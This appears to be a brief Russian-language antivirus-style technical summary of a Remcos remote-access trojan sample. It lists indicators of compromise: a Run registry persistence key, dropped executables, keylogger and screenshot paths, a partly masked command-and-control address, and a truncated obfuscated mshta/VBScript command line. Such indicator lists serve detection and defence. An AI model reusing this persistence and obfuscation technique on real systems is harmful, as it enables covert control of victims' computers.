Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Broderlands4' = '%TEMP%\underwool.exe'
- %WINDIR%\win.ini
- %TEMP%\underwool.exe
- %APPDATA%\Screenshots\time_20181205_192011.png
- %APPDATA%\Screenshots\time_20181205_192011.dat
- %APPDATA%\remcos\logs.dat
- %APPDATA%\Screenshots\time_20181205_192011.png
- '18#.#44.30.119':1111
- '%TEMP%\underwool.exe'
- '<SYSTEM32>\mshta.exe' vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\Curren...